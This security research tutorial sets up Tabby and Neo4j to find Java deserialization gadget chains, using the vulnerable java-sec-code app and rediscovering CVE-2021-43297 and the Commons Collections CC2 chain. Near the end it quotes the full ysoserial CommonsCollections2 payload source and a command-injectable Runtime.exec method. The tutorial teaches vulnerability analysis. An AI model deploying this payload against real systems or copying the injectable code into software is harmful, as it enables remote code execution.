# TABBY AND NEO4J TUTORIAL ## Environment Before setting up the tools, ensure you have the following prerequisites installed: **`docker, maven, jdk-21 (default), jdk-8`** ## Workflow Before setting up the tools, we must first need to understand what they are. ### Tabby Tabby is a static analysis framework designed specifically for detecting Java deserialization gadget chains. It addresses the complexity of manual auditing by converting Java bytecode (from JAR files) into a **Code Property Graph (CPG)**. Its workflow involves two main phases: - **Semantic Information Extraction**: It uses the Soot framework to parse Java classes and methods, extracting relationships like inheritance (Extend, Interface), aliases (Alias), and method calls (Call). - **Controllability Analysis**: Tabby applies a taint analysis algorithm to determine which variables and method calls are controllable by user input, pruning uncontrollable paths to optimize the graph. ### Neo4j Neo4j itself does not perform vulnerability detection. It serves as a graph backend that stores Tabby’s CPG and executes Cypher queries issued by tabby-vul-finder or tabby-path-finder. By mapping Java code structures into graph nodes (Classes, Methods) and edges (Calls, Aliases), Neo4j allows security researchers to: - **Query Chains:** Use the Cypher query language to search for connected paths between a Source (e.g., readObject) and a Sink (e.g., Runtime.exec). - **Visualize Attacks:** Graphically represent complex gadget chains, making it easier to understand how a vulnerability flows through multiple libraries. - **Automate Detection:** Work in conjunction with the plugin `tabby-path-finder` and the external engine `tabby-vul-finder` to automatically traverse the graph and identify potential exploits. **Discovery scenario:** ```graphql |1. Build CPG & Generate CSVs (tabby-core)| | v |2. Load Data (tabby-vul-finder)| | v |3. Query & Discovery (tabby-vul-finder)| | v |4. Visualization (Neo4j browser)| ``` ## Tabby installation ```bash git clone https://github.com/wh1t3p1g/tabby.git cd tabby mvn clean package -DskipTests ``` Copy the following code to `run.sh`: ```bash! if [ $1 = 'build' ] then echo "start to run tabby" java -Xmx8g -Xss512m -jar target/tabby.jar elif [ $1 = 'load' ] then java -jar tabby-vul-finder.jar --load $2 elif [ $1 = 'query' ] then java -jar tabby-vul-finder.jar --query $2 --prefix $3 elif [ $1 = 'pack' ] then tar -czvf output.tar.gz ./output/*.csv fi ``` ## Set up java-sec-code to test ```bash git clone https://github.com/JoyChou93/java-sec-code.git cd java-sec-code JAVA_HOME=/path/to/jdk-8 mvn clean package -DskipTests mkdir /path/to/tabby/cases cp target/java-sec-code-1.0.0.jar /path/to/tabby/cases ``` ## Run tabby Go to `tabby/` Edit the `settings.properties` to this: ```yaml # targets to analyse tabby.build.target = cases/java-sec-code-1.0.0.jar tabby.build.libraries = libs tabby.build.mode = web # important: gadget or web # tabby.build.mode = gadget tabby.output.directory = ./output/dev tabby.build.rules.directory = ./rules tabby.build.thread.size = 2 # settings for jre environments # important: set to false to use the system JRE tabby.build.useSettingJRE = true tabby.build.isJRE9Module = false tabby.build.javaHome = /usr/lib/jvm/java-8-openjdk-amd64 # debug tabby.debug.details = false tabby.debug.print.current.methods = true # jdk settings tabby.build.isJDKProcess = false # important: set to true to include all JDK classes in the analysis tabby.build.withAllJDK = false tabby.build.isJDKOnly = false # dealing fatjar tabby.build.checkFatJar = true # set false for debug tabby.build.removeNotPollutedCallSite = true # pointed-to analysis types tabby.build.interProcedural = true tabby.build.onDemandDrive = false # pointed-to analysis settings tabby.build.analysis.everything = true tabby.build.isPrimTypeNeedToCreate = false tabby.build.thread.timeout = 2 tabby.build.method.timeout = 5 tabby.build.alias.maxCount = 5 tabby.build.array.maxLength = 25 tabby.build.method.maxDepth = 500 tabby.build.method.maxBodyCount = 8000 tabby.build.method.maxLocalCount = 2000 tabby.build.object.maxTriggerTimes = 300 tabby.build.object.field.k.limit = 10 tabby.build.with.cache.enable = false tabby.build.isNeedToCreateIgnoreList = false tabby.build.isNeedToDealNewAddedMethod = true tabby.build.timeout.forceStop = true # plugin settings tabby.build.isNeedToProcessXml = true ``` ```bash ./run.sh build ``` **Note**: If you encounter "OOM Error" or the process crashes suddenly, check your available RAM and swap memory using `free -h`. After that, adjust the build option in `run.sh` accordingly. After finishing the process, check your output in `tabby/output/dev` ```bash ls output/dev ``` The output should be: ``` GRAPHDB_PUBLIC_ALIAS.csv GRAPHDB_PUBLIC_CLASSES.csv GRAPHDB_PUBLIC_HAS.csv GRAPHDB_PUBLIC_METHODS.csv GRAPHDB_PUBLIC_CALL.csv GRAPHDB_PUBLIC_EXTEND.csv GRAPHDB_PUBLIC_INTERFACES.csv ``` ## Set up Neo4j To use Neo4j, you need plugins for tabby. ### tabby-vul-finder ```bash git clone https://github.com/wh1t3p1g/tabby-vul-finder.git cd tabby-vul-finder ``` Change lombok in pom.xml to fit your jdk version: ```xml <dependency> <groupId>org.projectlombok</groupId> <artifactId>lombok</artifactId> <version>1.18.30</version> <scope>provided</scope> </dependency> ``` Change `src\main\java\tabby\vul\finder\core\Loader.java` to the following: ```java package tabby.vul.finder.core; import lombok.extern.slf4j.Slf4j; import org.neo4j.driver.Driver; import org.neo4j.driver.Session; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Component; import tabby.vul.finder.dal.service.ClassService; import tabby.vul.finder.dal.service.MethodService; import java.util.Arrays; import java.util.List; import java.util.concurrent.TimeUnit; /** * @author wh1t3p1g * @since 2023/3/8 */ @Slf4j @Component public class Loader { @Autowired private ClassService classService; @Autowired private MethodService methodService; @Autowired private Driver driver; public void load(){ long start = System.nanoTime(); classService.clear(); // clean old data createIndexes(); log.info("Try to load data."); methodService.importMethodRef(); classService.importClassRef(); classService.buildEdge(); classService.statistic(); long time = TimeUnit.NANOSECONDS.toSeconds(System.nanoTime() - start); log.info("Cost {} min {} seconds." , time/60, time%60); } private void createIndexes() { log.info("Start creating constraints and indexes..."); List<String> cyphers = Arrays.asList( "CREATE CONSTRAINT c1 IF NOT EXISTS FOR (c:Class) REQUIRE c.ID IS UNIQUE", "CREATE CONSTRAINT c2 IF NOT EXISTS FOR (c:Class) REQUIRE c.NAME IS UNIQUE", "CREATE CONSTRAINT c3 IF NOT EXISTS FOR (m:Method) REQUIRE m.ID IS UNIQUE", "CREATE CONSTRAINT c4 IF NOT EXISTS FOR (m:Method) REQUIRE m.SIGNATURE IS UNIQUE", "CREATE INDEX index1 IF NOT EXISTS FOR (m:Method) ON (m.NAME)", "CREATE INDEX index2 IF NOT EXISTS FOR (m:Method) ON (m.CLASSNAME)", "CREATE INDEX index3 IF NOT EXISTS FOR (m:Method) ON (m.NAME, m.CLASSNAME)", "CREATE INDEX index4 IF NOT EXISTS FOR (m:Method) ON (m.NAME, m.NAME0)", "CREATE INDEX index5 IF NOT EXISTS FOR (m:Method) ON (m.SIGNATURE)", "CREATE INDEX index6 IF NOT EXISTS FOR (m:Method) ON (m.NAME0)", "CREATE INDEX index7 IF NOT EXISTS FOR (m:Method) ON (m.NAME0, m.CLASSNAME)" ); try (Session session = driver.session()) { for (String cypher : cyphers) { try { String cleanCypher = cypher.trim().replaceAll(";$", ""); session.run(cleanCypher); } catch (Exception e) { log.warn("Failed to execute cypher: {}. Error: {}", cypher, e.getMessage()); } } } log.info("Constraints and indexes created successfully."); } } ``` Build: ```bash mvn clean package -DskipTests cp target/tabby-vul-finder.jar /path/to/tabby cp rules/cyphers.yml /path/to/tabby/rules ``` ### tabby-path-finder ```bash git clone https://github.com/tabby-sec/tabby-path-finder cd tabby-path-finder ``` Change lombok in pom.xml to fit your jdk version like above. Build: ```bash mvn clean package -DskipTests mkdir /path/to/tabby/plugins cp target/tabby-path-finder-1.1.jar /path/to/tabby/plugins ``` ### Neo4j ```bash cd /path/to/tabby wget "https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/download/5.20.0/apoc-5.20.0-extended.jar" -O plugins/apoc-5.20.0-extended.jar touch /config/db.properties ``` Paste the following config to `db.properties`: ``` tabby.neo4j.url=bolt://localhost:7687 tabby.neo4j.username=neo4j tabby.neo4j.password=<YOUR_PASSWORD> tabby.cache.isDockerImportPath=true ``` Make sure you are in `tabby/`, create `run_docker.sh` (remember to replace your password): ```bash #!/bin/bash # Stop the running container if it exists (avoid auto-restart issues) docker stop neo4j 2>/dev/null || true # Remove the container if it exists docker rm -f neo4j 2>/dev/null || true # Start Neo4j container docker run \ --name neo4j \ -p 7474:7474 -p 7687:7687 \ -d \ --restart unless-stopped \ --memory=8gb \ --memory-swap=8gb \ -v "$PWD/output:/var/lib/neo4j/import" \ -v "$PWD/plugins:/plugins" \ -v "$PWD/neo4j_data:/data" \ -e NEO4J_AUTH=neo4j/<YOUR_PASSWORD> \ -e NEO4J_server_memory_heap_initial__size=5G \ -e NEO4J_server_memory_heap_max__size=5G \ -e NEO4J_server_memory_pagecache_size=1G \ -e NEO4J_dbms_memory_transaction_total_max=0 \ -e NEO4J_apoc_export_file_enabled=true \ -e NEO4J_apoc_import_file_enabled=true \ -e NEO4J_dbms_security_procedures_unrestricted='apoc.*,tabby.*' \ -e NEO4J_PLUGINS='["apoc"]' \ neo4j:5.20.0 ``` **Note:** You can adjust memory configurations to fit your machine's conditions. Run Neo4j: ```bash ./run_docker.sh ``` Wait for the query to execute, then load the data: ```bash ./run.sh load dev ``` ![image](https://hackmd.io/_uploads/HyCFC-2GZg.png) Access http://localhost:7474/browser/, login and try this this query to check the integration with tabby: ```sql SHOW PROCEDURES YIELD name WHERE name STARTS WITH 'tabby' RETURN name ``` ```sql CALL tabby.version(); ``` **Note:** If you have any memory-related issues with Neo4j, remove the container and adjust the allocation configurations in the run command. ## Neo4j query Show the shortest and longest call paths from a source (readObject): ```sql CALL { MATCH (c:Class) RETURN count(c) AS classes } CALL { MATCH (m:Method) RETURN count(m) AS methods } RETURN classes, methods; ``` Count the number of chains between methods (the number of edges): ```sql MATCH (m1:Method)-[r:CALL]->(m2:Method) RETURN count(r) as total_chains; ``` Show one path from source (web endpoint) to sink (Runtime.exec) ```sql MATCH(source:Method {IS_ENDPOINT: true}) MATCH(sink:Method {IS_SINK: true, VUL:"EXEC"}) CALL tabby.beta.findPath(source, "-", sink, 8, false) YIELD path RETURN path LIMIT 1 ``` ![image](https://hackmd.io/_uploads/r1sE2g2GWl.png) The image shows that the RCE can be reached with only two method invocations from a web endpoint: ```java CommandExec(String) -> Runtime.exec(String) -> Runtime.exec(String, String[], File) ``` Source code reference: ```java public String CommandExec(String cmd) { Runtime run = Runtime.getRuntime(); StringBuilder sb = new StringBuilder(); try { Process p = run.exec(cmd); BufferedInputStream in = new BufferedInputStream(p.getInputStream()); BufferedReader inBr = new BufferedReader(new InputStreamReader(in)); String tmpStr; while ((tmpStr = inBr.readLine()) != null) { sb.append(tmpStr); } if (p.waitFor() != 0) { if (p.exitValue() == 1) return "Command exec failed!!"; } inBr.close(); in.close(); } catch (Exception e) { return e.toString(); } return sb.toString(); } ``` Automated query using the default `cypher.yml` given by `tabby-vul-finder` to find general web vulnerabilities: ``` ./run.sh query rules/cypher <name> ``` Result: ![image](https://hackmd.io/_uploads/SknZ0f2MWl.png) **Note:** To hunt gadget chains, you MUST change the `settings.properties` to enable the following params and rebuild ```yaml! ... tabby.build.mode = gadget tabby.build.withAllJDK = true ... ``` ## Other test cases ### CVE-2021-43297 ```sql match (source: Method {NAME:"toString"}) match (sink: Method {IS_SINK: true, NAME: "invoke"}) call tabby.beta.findPath(source, "<", sink, 6, true) yield path where none (n in nodes (path) where n.CLASSNAME in ["java.io.ObjectInputStream","com.oracle.webservices.internal.api.message.BasePropertySet$Accessor","javax.imageio.ImageIO$ContainsFilter","java.security.PrivilegedAction"]) return path limit 1 ``` ![image](https://hackmd.io/_uploads/rJP8-P3zWx.png) ![image](https://hackmd.io/_uploads/rJXR7PhMbe.png) ```graphql [Source] javax.swing.MultiUIDefaults.toString() └──> calls javax.swing.MultiUIDefaults.get() └──> calls javax.swing.UIDefaults.get() └──> calls javax.swing.UIDefaults.getFromHashtable() └──> [Interface Invoke] javax.swing.UIDefaults$LazyValue.createValue() └──> [Impl] sun.swing.SwingLazyValue.createValue() └──> [Sink] java.lang.reflect.Method.invoke() ``` ### CC2 gadget chain (Common-collections 4.0) The following setup is to manually rediscover the famous gadget chains CC2 and CC4. #### Setup Install common-collections 4.0: ``` wget "https://repo1.maven.org/maven2/org/apache/commons/commons-collections4/4.0/commons-collections4-4.0.jar" cp commons-collections4-4.0.jar /path/to/tabby/target ``` Configure`settings.properties`: ``` # targets to analyse tabby.build.target = cases/commons-collections4-4.0.jar tabby.build.libraries = libs tabby.build.mode = gadget tabby.output.directory = ./output/dev tabby.build.rules.directory = ./rules tabby.build.thread.size = 2 # settings for jre environments tabby.build.useSettingJRE = true tabby.build.isJRE9Module = false tabby.build.javaHome = <PATH_TO_JDK-8> # debug tabby.debug.details = false tabby.debug.print.current.methods = true # jdk settings tabby.build.isJDKProcess = false tabby.build.withAllJDK = true tabby.build.isJDKOnly = false # dealing fatjar tabby.build.checkFatJar = true # set false for debug tabby.build.removeNotPollutedCallSite = true # pointed-to analysis types tabby.build.interProcedural = true tabby.build.onDemandDrive = false # pointed-to analysis settings tabby.build.analysis.everything = true tabby.build.isPrimTypeNeedToCreate = false tabby.build.thread.timeout = 2 tabby.build.method.timeout = 5 tabby.build.alias.maxCount = 5 tabby.build.array.maxLength = 25 tabby.build.method.maxDepth = 500 tabby.build.method.maxBodyCount = 8000 tabby.build.method.maxLocalCount = 2000 tabby.build.object.maxTriggerTimes = 300 tabby.build.object.field.k.limit = 10 tabby.build.with.cache.enable = false tabby.build.isNeedToCreateIgnoreList = false tabby.build.isNeedToDealNewAddedMethod = true tabby.build.timeout.forceStop = true # plugin settings tabby.build.isNeedToProcessXml = true ``` Remove old results: ``` cd tabby/ sudo rm -rf output/dev/* sudo rm -rf neo4j_data/* ``` Stop the Neo4j container. ```bash docker stop neo4j docker rm -f neo4j ``` Build: ``` ./run.sh build ``` Start the Neo4j container like above. Wait until it fully starts, **create index** and then load: #### Query Cypher rule: ```yaml # cyphers.yml name: "commons_collections4_cc2_cc4" enable: true type: "gadget" source: type: "source" cypher: "match (source:Method {NAME:\"readObject\",CLASSNAME:\"java.util.PriorityQueue\"})" sink: type: "sink" sink: true name: "invoke" depth: 10 limit: 1 direct: "<" depthFirst: true procedure: "tabby.algo.findPath" sourceBlacklists: [] pathBlacklists: - java.io.ObjectInputStream#defaultReadObject - java.io.ObjectInputStream#readObject ``` Explain: This rule attempts to find a gadget chain. It starts at the entry point java.util.PriorityQueue.readObject() and searches forward to find a path that eventually reaches the dangerous sink method invoke **Note:** We target Method.invoke instead of Runtime.exec because the gadget chain relies on Java Reflection. Static analysis detects the code path calling invoke, whereas Runtime.exec is merely the payload dynamically injected into it at runtime. **Result:** ``` /* java.util.PriorityQueue#readObject -[CALL]-> java.util.PriorityQueue#heapify -[CALL]-> java.util.PriorityQueue#siftDown -[CALL]-> java.util.PriorityQueue#siftDownUsingComparator -[CALL]-> java.util.Comparator#compare -[ALIAS]-> org.apache.commons.collections4.comparators.TransformingComparator#compare -[CALL]-> org.apache.commons.collections4.Transformer#transform -[ALIAS]-> org.apache.commons.collections4.functors.InvokerTransformer#transform -[CALL]-> java.lang.reflect.Method#invoke */ match path=(m16:Method {NAME0:"java.util.PriorityQueue#readObject"}) -[:CALL]-> (m14:Method {NAME0:"java.util.PriorityQueue#heapify"}) -[:CALL]-> (m12:Method {NAME0:"java.util.PriorityQueue#siftDown"}) -[:CALL]-> (m10:Method {NAME0:"java.util.PriorityQueue#siftDownUsingComparator"}) -[:CALL]-> (m8:Method {NAME0:"java.util.Comparator#compare"}) -[:ALIAS]-> (m6:Method {NAME0:"org.apache.commons.collections4.comparators.TransformingComparator#compare"}) -[:CALL]-> (m4:Method {NAME0:"org.apache.commons.collections4.Transformer#transform"}) -[:ALIAS]-> (m2:Method {NAME0:"org.apache.commons.collections4.functors.InvokerTransformer#transform"}) -[:CALL]-> (m0:Method {NAME0:"java.lang.reflect.Method#invoke"}) return path ``` ```graphql [Source] java.util.PriorityQueue.readObject() └──> calls java.util.PriorityQueue.heapify() └──> calls java.util.PriorityQueue.siftDown() └──> calls java.util.PriorityQueue.siftDownUsingComparator() └──> [Interface Invoke] java.util.Comparator.compare() └──> [Impl] org.apache.commons.collections4.comparators.TransformingComparator.compare() └──> calls org.apache.commons.collections4.Transformer.transform() └──> [Impl] org.apache.commons.collections4.functors.InvokerTransformer.transform() └──> [Sink] java.lang.reflect.Method.invoke() ``` **Visualize on Neo4j:** ![image](https://hackmd.io/_uploads/rkfBAGsGZx.png) **`ysoserial`** payload source: ```java package ysoserial.payloads; import java.util.PriorityQueue; import java.util.Queue; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.InvokerTransformer; import ysoserial.payloads.annotation.Authors; import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.Gadgets; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; /* Gadget chain: ObjectInputStream.readObject() PriorityQueue.readObject() ... TransformingComparator.compare() InvokerTransformer.transform() Method.invoke() Runtime.exec() */ @SuppressWarnings({ "rawtypes", "unchecked" }) @Dependencies({ "org.apache.commons:commons-collections4:4.0" }) @Authors({ Authors.FROHOFF }) public class CommonsCollections2 implements ObjectPayload<Queue<Object>> { public Queue<Object> getObject(final String command) throws Exception { final Object templates = Gadgets.createTemplatesImpl(command); // mock method name until armed final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); // create queue with numbers and basic comparator final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer)); // stub data for replacement later queue.add(1); queue.add(1); // switch method called by comparator Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); // switch contents of queue final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue"); queueArray[0] = templates; queueArray[1] = 1; return queue; } public static void main(final String[] args) throws Exception { PayloadRunner.run(CommonsCollections2.class, args); } } ``` **Conclusion:** tabby-vul-finder successfully rediscovered the CC2 chain.